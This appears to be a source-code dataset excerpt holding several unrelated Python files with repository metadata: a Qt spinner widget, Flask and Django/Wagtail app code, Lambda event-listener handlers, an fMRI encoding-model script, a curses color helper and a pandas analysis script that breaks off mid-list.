self._numberOfLines = lines
self._currentCounter = 0
self.updateTimer()
def setLineLength(self, length):
self._lineLength = length
self.updateSize()
def setLineWidth(self, width):
self._lineWidth = width
self.updateSize()
def setInnerRadius(self, radius):
self._innerRadius = radius
self.updateSize()
def color(self):
return self._color
def roundness(self):
return self._roundness
def minimumTrailOpacity(self):
return self._minimumTrailOpacity
def trailFadePercentage(self):
return self._trailFadePercentage
def revolutionsPersSecond(self):
return self._revolutionsPerSecond
def numberOfLines(self):
return self._numberOfLines
def lineLength(self):
return self._lineLength
def isTrailSizeDecreasing(self):
return self._trailSizeDecreasing
def lineWidth(self):
return self._lineWidth
def innerRadius(self):
return self._innerRadius
def isSpinning(self):
return self._isSpinning
def setRoundness(self, roundness):
self._roundness = max(0.0, min(100.0, roundness))
def setColor(self, color=Qt.black):
self._color = QColor(color)
def setRevolutionsPerSecond(self, revolutionsPerSecond):
self._revolutionsPerSecond = revolutionsPerSecond
self.updateTimer()
def setTrailFadePercentage(self, trail):
self._trailFadePercentage = trail
def setTrailSizeDecreasing(self, value):
self._trailSizeDecreasing = value
def setMinimumTrailOpacity(self, minimumTrailOpacity):
self._minimumTrailOpacity = minimumTrailOpacity
def rotate(self):
self._currentCounter += 1
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
self.update()
def updateSize(self):
size = int((self._innerRadius + self._lineLength) * 2)
self.setFixedSize(size, size)
def updateTimer(self):
self._timer.setInterval(int(1000 / (self._numberOfLines *
self._revolutionsPerSecond)))
def updatePosition(self):
if self.parentWidget() and self._centerOnParent:
self.move(int(self.parentWidget().width() / 2 -
self.width() / 2),
int(self.parentWidget().height() / 2 -
self.height() / 2))
def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
distance = primary - current
if distance < 0:
distance += totalNrOfLines
return distance
def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
color = QColor(colorinput)
if countDistance == 0:
return color
minAlphaF = minOpacity / 100.0
distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
if countDistance > distanceThreshold:
color.setAlphaF(minAlphaF)
else:
alphaDiff = color.alphaF() - minAlphaF
gradient = alphaDiff / float(distanceThreshold + 1)
resultAlpha = color.alphaF() - gradient * countDistance
resultAlpha = min(1.0, max(0.0, resultAlpha))
color.setAlphaF(resultAlpha)
return color
| true
| true
|
f71926594989831bd3fe9b4bdf47da2f462f2958
| 91
|
py
|
Python
|
app/main/__init__.py
|
gichimux/news_highlight_0.1
|
c085db3b80944bc18960b4896c7cb8d2a15bd305
|
[
"MIT"
] | 1
|
2019-03-21T03:06:29.000Z
|
2019-03-21T03:06:29.000Z
|
app/main/__init__.py
|
gichimux/news_highlight_0.1
|
c085db3b80944bc18960b4896c7cb8d2a15bd305
|
[
"MIT"
] | null | null | null |
app/main/__init__.py
|
gichimux/news_highlight_0.1
|
c085db3b80944bc18960b4896c7cb8d2a15bd305
|
[
"MIT"
] | 1
|
2020-04-03T02:36:34.000Z
|
2020-04-03T02:36:34.000Z
|
from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors
| 18.2
| 34
| 0.769231
|
from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors
| true
| true
|
f7192710ad408630f6ee5b7d502e00787c41b0a8
| 2,222
|
py
|
Python
|
event_pubsub/handlers/event_listener_handlers.py
|
anandrgitnirman/snet-marketplace-service
|
f31bf741094476b9cb26277f1165deb2856257b1
|
[
"MIT"
] | null | null | null |
event_pubsub/handlers/event_listener_handlers.py
|
anandrgitnirman/snet-marketplace-service
|
f31bf741094476b9cb26277f1165deb2856257b1
|
[
"MIT"
] | null | null | null |
event_pubsub/handlers/event_listener_handlers.py
|
anandrgitnirman/snet-marketplace-service
|
f31bf741094476b9cb26277f1165deb2856257b1
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events()
| 42.730769
| 112
| 0.860036
|
import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events()
| true
| true
|
f71927526b4a5695020b5b175570366eb0a2f1d0
| 6,086
|
py
|
Python
|
analysis/baseline/s02_perform_encoding.py
|
eduardojdiniz/Buzznauts
|
8ac242a8d5309b4090a0f0b148ec275cac762bc0
|
[
"MIT"
] | 2
|
2021-08-03T15:07:04.000Z
|
2022-03-02T15:10:07.000Z
|
analysis/baseline/s02_perform_encoding.py
|
eduardojdiniz/Buzznauts
|
8ac242a8d5309b4090a0f0b148ec275cac762bc0
|
[
"MIT"
] | 8
|
2021-08-04T14:21:14.000Z
|
2021-08-16T21:07:12.000Z
|
analysis/baseline/s02_perform_encoding.py
|
eduardojdiniz/Buzznauts
|
8ac242a8d5309b4090a0f0b148ec275cac762bc0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
# Here as an example we use first 900 videos as training and rest of
# the videos as validation
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
# result visualization for whole brain (full_track)
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| 38.518987
| 79
| 0.544857
|
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| true
| true
|
f719275c0f8f28584e41df42235876facf663976
| 2,395
|
py
|
Python
|
ayewa/views.py
|
JoanEliot/ayewa
|
e36128357564cb83938b2d7096b3fe75330dc948
|
[
"MIT"
] | null | null | null |
ayewa/views.py
|
JoanEliot/ayewa
|
e36128357564cb83938b2d7096b3fe75330dc948
|
[
"MIT"
] | null | null | null |
ayewa/views.py
|
JoanEliot/ayewa
|
e36128357564cb83938b2d7096b3fe75330dc948
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
# Search
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
# In production, use ElasticSearch and a simplified search query, per
# http://docs.wagtail.io/en/v1.12.1/topics/search/backends.html
# like this:
search_results = Page.objects.live().search(search_query)
else:
# If we aren't using ElasticSearch for the demo, fall back to native db search.
# But native DB search can't search specific fields in our models on a `Page` query.
# So for demo purposes ONLY, we hard-code in the model names we want to search.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
# Record hit
query.add_hit()
else:
search_results = Page.objects.none()
# Pagination
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| 39.916667
| 100
| 0.681002
|
from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
search_results = Page.objects.live().search(search_query)
else:
# But native DB search can't search specific fields in our models on a `Page` query.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
query.add_hit()
else:
search_results = Page.objects.none()
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| true
| true
|
f71928ded4483b24d811acaae516a6fa0a846be5
| 2,771
|
py
|
Python
|
lib/terminal.py
|
stevecotton/i18nspector
|
b9fa6f5c54341f8c7e82b48adb0de05376bab8e7
|
[
"MIT"
] | 1
|
2016-10-25T18:22:02.000Z
|
2016-10-25T18:22:02.000Z
|
lib/terminal.py
|
stevecotton/i18nspector
|
b9fa6f5c54341f8c7e82b48adb0de05376bab8e7
|
[
"MIT"
] | 8
|
2016-08-25T17:37:49.000Z
|
2022-02-17T20:47:31.000Z
|
lib/terminal.py
|
stevecotton/i18nspector
|
b9fa6f5c54341f8c7e82b48adb0de05376bab8e7
|
[
"MIT"
] | 3
|
2017-03-03T00:50:28.000Z
|
2021-08-17T16:43:25.000Z
|
# Copyright © 2012-2018 Jakub Wilk <jwilk@jwilk.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
color terminal support
'''
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
'''
returns a string that changes the foreground color
'''
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s: # work-around for https://bugs.debian.org/902630
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
'''
returns a string that resets all attributes
'''
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
'''
initialize the terminal
'''
global _curses # pylint: disable=global-statement
try:
import curses as _curses # pylint: disable=redefined-outer-name,import-outside-toplevel
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
# vim:ts=4 sts=4 sw=4 et
| 28.864583
| 96
| 0.674125
|
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s:
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
global _curses
try:
import curses as _curses
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
| true
| true
|
f7192a92add38302ca93b33ef7669bbdd2fd3d64
| 1,534
|
py
|
Python
|
backend/examples/managers.py
|
daobook/doccano
|
45122687740f74f19e2578c5cf28507f0839bf16
|
[
"MIT"
] | 2
|
2021-12-11T22:25:27.000Z
|
2021-12-20T01:02:16.000Z
|
backend/examples/managers.py
|
daobook/doccano
|
45122687740f74f19e2578c5cf28507f0839bf16
|
[
"MIT"
] | 1
|
2022-02-15T10:50:18.000Z
|
2022-02-15T10:50:18.000Z
|
backend/examples/managers.py
|
daobook/doccano
|
45122687740f74f19e2578c5cf28507f0839bf16
|
[
"MIT"
] | null | null | null |
from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| 35.674419
| 91
| 0.594524
|
from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| true
| true
|
f7192c7b1ed57d054d205ebd4ca697e7e2c4e65c
| 10,095
|
py
|
Python
|
datapreparation/analyze.py
|
Anders-Holst/Bonsai
|
841aa4e12c8bea8945396bd232c2006260127507
|
[
"MIT"
] | null | null | null |
datapreparation/analyze.py
|
Anders-Holst/Bonsai
|
841aa4e12c8bea8945396bd232c2006260127507
|
[
"MIT"
] | null | null | null |
datapreparation/analyze.py
|
Anders-Holst/Bonsai
|
841aa4e12c8bea8945396bd232c2006260127507
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
""" -------------------------------
analyse.py
Copyright (C) 2018 RISE
This code was produced by RISE
The 2013-04-10 version
bonsai/src_v02/analyze.py
simple analysis of pandas dataframes data
such as
1. find duplicated rows
2. number of unique values in a column
3. number of unique values in common
between two columns in two different
files
4.
------------------------------------"""
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
d = df.drop_duplicates()
return len(d)
def nr_of_unique_values_in_cols(df, cols):
c = df.drop_duplicates(subset = cols)
return len(c)
def nr_of_unique_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
return len(c)
"""
def nr_of_unique_numeric_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isnumeric()
c = c[c].index.values
"""
def nr_of_nonnan_values(df, col):
c = df[col].dropna()
return len(c)
def nr_of_unique_digital_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isdigit()
c = c[c].index.values
# df = df.drop_duplicates(subset = col)
# df = df[ df[col].dropna().str.isdigit() ]
# df = df[ df[col].str.contains('\d', regex=True) ]
return len(c)
def duplicated_rows(df):
df['dup'] = df.duplicated()
df = df[df['dup'] == True]
return df
def print_duplicated_rows(df, nr):
dup = duplicated_rows(df)
print('Nr of rows in total', len(df))
print('Nr of duplicated rows', len(dup))
nr = min( nr,len(dup) )
if nr > 0:
print('the first', nr,' of them')
print(dup[0:nr])
return dup
def unique_number_values(df, col):
df = df.drop_duplicates(subset = col)
df = df[ df[col].str.contains('\d', regex=True) ]
return df
def info(df, name = ''):
print()
if name != '':
print()
print('--------------------------------------------------')
print()
print('\tInfo on the file\n\t' + name)
print()
print('--------------------------------------------------')
print()
df_unique_nr = nr_of_unique_rows(df)
print(' shape', df.shape)
print(' unique rows', df_unique_nr)
for c in df.columns:
print()
print('\tInfo on non-nan values of column', c)
print()
nonnan_nr = nr_of_nonnan_values(df, c)
unique_nr = nr_of_unique_values(df, c)
digital_nr = nr_of_unique_digital_values(df, c)
# numeric_nr = nr_of_unique_numeric_values(df, c)
print('non-nan values', nonnan_nr)
print(' unique values', unique_nr)
print('digital values', digital_nr)
# print('numeric values', unique_nr)
print()
# return unique_number_values(df, 'ICD10')
# df = df[ df[c].str.contains('\d', regex=True) ]
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
